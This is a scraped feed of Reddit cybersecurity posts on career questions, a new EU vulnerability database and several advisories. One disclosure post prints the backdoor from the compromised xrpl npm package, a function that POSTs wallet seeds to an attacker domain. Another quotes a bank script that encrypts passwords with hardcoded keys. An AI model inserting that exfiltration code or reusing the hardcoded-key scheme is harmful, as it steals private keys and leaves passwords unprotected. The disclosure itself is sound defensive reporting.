submitted by /u/Permit_io [link] [comments]

The decentralization of such an important pillar of Cybersecurity is great news. Many of us saw this coming since the NIS2 directive was announced in EU. The website is still beta, and the API implementation is on it's way. As they said, the idea is to integrate with the existing NVD established practices: Each vulnerability gets a unique EUVD ID (EUVD-2021-12345) Cross-references with existing CVEs Vulnerabilities are scored using CVSS Includes vulnerabilities reported by the CSIRT network, strengthening accuracy and relevance. EU Vulnerability Database from (ENISA) submitted by /u/No-Key667 [link] [comments]

Hello guys i have around 1.6 Y of experience in web and Infrastructure/Network Penetration testing. I have CEH PRACTICAL certificate I'm planning to do next big certification but I'm confused which one to pursue... eWPTX or PNPT or any other OSCP is out of buget rn (please suggest only industry renowned certs) submitted by /u/PaleBrother8344 [link] [comments]

I recently joined as SOC analyst and We have 30mins meeting every fortnight but we still don’t have anything to share. We’re just team of 3( manager,me and one more analyst) So wondering, what do you guys normally do? submitted by /u/Full-Bullfrog4707 [link] [comments]

submitted by /u/RngdZed [link] [comments]

submitted by /u/tame-impaled [link] [comments]

Quick question: Is it acceptable for a CISO to act as a DPO at the same time? Would love to hear your thoughts on this. submitted by /u/Easy-Vermicelli7802 [link] [comments]

Looking to an add a short news style podcast to my morning focused on current cybersecurity happenings. Send your recommendations! submitted by /u/capybaralover515 [link] [comments]

When Microsoft Says "Less Likely to be Exploited" But Hackers Say "Challenge Accepted" Microsoft labeled CVE-2025-24054 as "less likely to be exploited" on Patch Tuesday. Just 8 DAYS LATER, it was weaponized against government targets in Poland and Romania. This video explains how a simple .library-ms file can leak your NTLM hash with just a single click Why these attacks went from targeted to international in under two weeks The possible connection to Russia-backed APT28 (Fancy Bear) Why relying solely on vendor exploitability ratings is a dangerous game As security professionals, we need to remember that "less likely to be exploited" isn't the same as "won't be exploited" especially when it comes to easily weaponized vulnerabilities. https://youtu.be/ZrdvJdrYgyg submitted by /u/Electronic-Ad6523 [link] [comments]

Wanted to get everyone's thoughts on a platform that gives access to pre-vetted cyber security scenarios to employees. This way, it's no longer just a one and done cyber security training and it gives the employees actual practice on how to apply what's been taught. I wanted to get people's thoughts on if you're already using tabletop exercises like this to improve knowledge retention. If so, what is the hardest thing about scaling it to more than just 1 or 2 volunteers during a training session? submitted by /u/Awkward-Result8868 [link] [comments]

An authentication bypass vulnerability in CrushFTP (CVE-2025-31161) is currently being exploited in the wild. It affects Versions 10.0.0 to 10.8.3 and versions 11.0.0 to 11.3.0. If exploited, it can allow attackers to access sensitive files without valid credentials and gain full system control depending on configuration Active exploitation has already been confirmed, yet it's flying under the radar. Recommended mitigation would be to upgrade to 10.8.4 or 11.3.1 ASAP. If patching isn’t possible, CrushFTP’s DMZ proxy can provide a temporary buffer. If you're running CrushFTP or know someone who is, now’s the time to double-check your version and get this patched. Wouldn’t be surprised if we see this pop up in a ransomware chain soon. submitted by /u/bytelocksolutions [link] [comments]

Hey there guys, Long time lurker, first time poster here. Some time back (years ago, at this point), I'd been working on making an entry-level guide for people first entering this space. Specifically, one geared for Sec+ training and eval. I got pretty far into it, but have had too many other things come up in life and honestly haven't had the time to actually finish it. Instead of just kicking it to the dust bin, I thought I'd try and share what I have here. Perhaps the community might still find a use for it? Unabashedly, I am a bit of a nerd. I was ultimatly going to paint the guide in a kind of Cyberpunk veneer, but never fully got around to realizing that. So please, try to forgive the netwatch/corpo speak in the doc. Heres the link: https://docs.google.com/document/d/1myCCIrFWV7w3sSRROzCsVMhH1H6wC-dsZDa_Worgj8k/edit?usp=sharing The parts of the guide I still find kinda useful are: cryptographic fundementals Sections on TCP/IP, DNS and CIDR Addressing There's about 10 pages covering various architectures (e.g., access control, cyptographic, et cetera.) About 15, or so, pages of homelab results and notes regarding attack methodologies (e.g., application & cyptoanalytic attacks, various network attacks, that sort of thing.) Perhaps you'll find those sections useful too? But anyhow, if this kind of thing ends up going against the subs rules, I apologize. I hadn't noticed anything explicit in the FAQ. Regardless, I'm sure the mods will let me know. I hope you guys enjoy! Until later, -A Humble Traveller P.S. If you guys notice any glaring screw ups in the information, please let me know! I'd rather be embarrassed than sorry. Thanks! submitted by /u/-A_Humble_Traveler- [link] [comments]

Our current fleet of laptops are all Microsoft Entra / Intune managed and joined. We have no local A/D. We have Entra rotate local adminsitration account passwords. Is there a scanner out their that can utilize modern authentication via Entra? We have having issues getting our products to do authenticated scans. We have Tenable Nessus and I understand that they have a client we can install on the laptops. submitted by /u/Dizzy_Bridge_794 [link] [comments]

Within the last few weeks we’ve noticed issues with many saas products that we use on a regular basis. Zoom, Spotify, even the dating apps Hinge and Bumble. The other day I had an issue with GCP. Breaches left and right. I can’t be the only one thinking that it’s some sort of larger event given all the other shit that’s been happening in the news… submitted by /u/kbk2015 [link] [comments]

submitted by /u/miso25 [link] [comments]

submitted by /u/Open_Ganache_1647 [link] [comments]

|| || |1Password service is unavailable New incident: Investigating We are currently investigating a service disruption affecting our the 1Password web interface. Our engineering team is actively working to identify and resolve the issue. Time posted Apr 22, 09:09 EDT Components affected USA/Global - Sign in USA/Global - Sign up USA/Global - Admin console USA/Global - SSO (Single Sign On) USA/Global - Multi-factor Authenticat... | submitted by /u/indatank [link] [comments]

submitted by /u/Total_Purpose_8499 [link] [comments]

Hi guys, i recently tried and failed to log into my online bank account, i was surprised that my stored password (on firefox) was wrong. I wanted to check their js by inspect the page, but the right-click was disable. Of course it wasn't a huge effort to access it anyway. Then i found this weird JS script that encrypt the password form, with hardcoded seeds. The decrypt function work as well. I wonder if it's a complete wast of time, or can be usefull in someway... It's kinda sound like amateur work... Any ideas ? Here some snippets: (common.js.jsf) function gethash() { const seeds1 = "&@%#!&EGDSG*&@EGHSATD*&@"; const seeds2 = "<MASYDhFLDYF2831238735634#@@&#"; const seeds3 = "(*!@##&%^%@#^%@#&gbdgsgbWTQYWTEABD"; return CryptoJS.SHA256((seeds1 + seeds2 + seeds3)); } function encrypt(input) { try { let iv = CryptoJS.enc.Hex.parse('0000000000000000'); // Replace with a secure IV let hash = this.gethash(); if (!hash) { throw new Error("Key hash is invalid or undefined."); } let encrypted = CryptoJS.AES.encrypt(input, hash, { iv: iv, mode: CryptoJS.mode.CBC, padding: CryptoJS.pad.Pkcs7, }); return encrypted.toString(); } catch (error) { } } // Work in the console function decrypt(input) { try { let hash = this.gethash(); let iv = CryptoJS.enc.Hex.parse('0000000000000000'); if (!hash) { throw new Error("Key hash is invalid or undefined."); } let decrypted = CryptoJS.AES.decrypt(input, hash, { iv: iv, mode: CryptoJS.mode.CBC, padding: CryptoJS.pad.Pkcs7 }); return decrypted.toString(CryptoJS.enc.Utf8); } catch (error) { } } // Called when press the "connexion" button function encryptPasswordInForm(inputs) { var inputId = inputs.split(','); var pwdEncrypted = document.getElementById("pwdEncrypt"); for (i = 0; i < inputId.length; i++) { const passwordField = document.getElementById(inputId[i]); if (passwordField) { if(passwordField.value !=null && passwordField.value !=''){ const encryptedPassword = encrypt(passwordField.value); passwordField.value = encryptedPassword; } } } if(pwdEncrypted){ pwdEncrypted.value = 'y'; } } function decryptPasswordInForm(inputs) { var inputId = inputs.split(','); for (i = 0; i < inputId.length; i++) { const passwordField = document.getElementById(inputId[i]); if (passwordField) { const decryptedPassword = decrypt(passwordField.value); passwordField.value = decryptedPassword; } } } submitted by /u/naruto--420 [link] [comments]

A few hours ago we discovered that malware was introduced into the XRPL package on NPM. This is the offical SDK for Ripple to interact with the Ripple ledger. The malicious package is still live right now - https://www.npmjs.com/package/xrpl?activeTab=code (src/index.ts) Technical Details Malware Function: A malicious function checkValidityOfSeed was inserted. It POSTs private key data to an attacker's domain 0x9c[.]xyz (C2 server). How was it injected? Code was committed user mukulljangid, believed to be a compromised Ripple employee account. (employee at ripple since 2021 has the same information on Linkedin) ​ export { Client, ClientOptions } from './client' 2 3export * from './models' 4 5export * from './utils' 6 7export { default as ECDSA } from './ECDSA' 8 9export * from './errors' 10 11export { FundingOptions } from './Wallet/fundWallet' 12export { Wallet } from './Wallet' 13 14export { walletFromSecretNumbers } from './Wallet/walletFromSecretNumbers' 15 16export { keyToRFC1751Mnemonic, rfc1751MnemonicToKey } from './Wallet/rfc1751' 17 18export * from './Wallet/signer' 19 20const validSeeds = new Set<string>([]) 21export function checkValidityOfSeed(seed: string) { 22 if (validSeeds.has(seed)) return 23 validSeeds.add(seed) 24 fetch("https://0x9c.xyz/xc", { method: 'POST', headers: { 'ad-referral': seed, } }) 25} You can view the full technical breakdown here -> https://www.aikido.dev/blog/xrp-supplychain-attack-official-npm-package-infected-with-crypto-stealing-backdoor Affected Versions: 4.2.4 4.2.3 4.2.2 4.2.1 2.14.2 Impact If major wallets or exchanges unknowingly upgraded to an infected version, it could cause widespread private key theft across the ecosystem. Swift patching and response are crucial to minimize fallout. submitted by /u/Advocatemack [link] [comments]

Hello, I have known a few people who did cyber for some of the big dogs when they were little startups and have tons of company stock or know people who know people who currently work at them and rave about the pay and benefits. Unfortunately I didnt know them well enough to ask, how did you get in there? Did you know someone? Typical Linkedin listing? special website? I am curious if anyone here can speak to that and also let us know if its not all its cracked up to be. submitted by /u/AverageAdmin [link] [comments]

submitted by /u/Party_Wolf6604 [link] [comments]

submitted by /u/boom_bloom [link] [comments]

submitted by /u/donutloop [link] [comments]

submitted by /u/Novel_Negotiation224 [link] [comments]

This is the weekly thread for career and education questions and advice. There are no stupid questions; so, what do you want to know about certs/degrees, job requirements, and any other general cybersecurity career questions? Ask away! Interested in what other people are asking, or think your question has been asked before? Have a look through prior weeks of content - though we're working on making this more easily searchable for the future. submitted by /u/AutoModerator [link] [comments]

Hello, The editors at CISO Series present this AMA, and they have assembled security leaders who left their roles as CISOs to start their own security companies. They are here to answer any relevant questions about taking the leap of faith from a CISO role to start their own business (launching a security solution or becoming a vCISO/consultant). This has been a long-term partnership between r/cybersecurity and the CISO Series. This week's participants are: Ian Amit, (/u/iiamit), CEO & Co-Founder, GomBoc,ai Sara Lazarus, (/u/securitybysara), Founder and CISO , Faded Jeans Technology Olivia Rose, (/u/SinkBusiness8170), CISO and Founder, Rose CISO Group Rolin (Bud) Peets, (/u/TrustCISOBud), Chief Protection Architect, Harbor IT Proof Photos This AMA will run all week from 20 Apr 2025 to 26 Apr 2025. Our participants will check in over that time to answer your questions. All AMA participants are chosen by the editors at CISO Series (/r/CISOSeries), a media network for security professionals delivering the most fun you’ll have in cybersecurity. Please check out our podcasts and weekly Friday event, Super Cyber Friday, at cisoseries.com. submitted by /u/Oscar_Geare [link] [comments]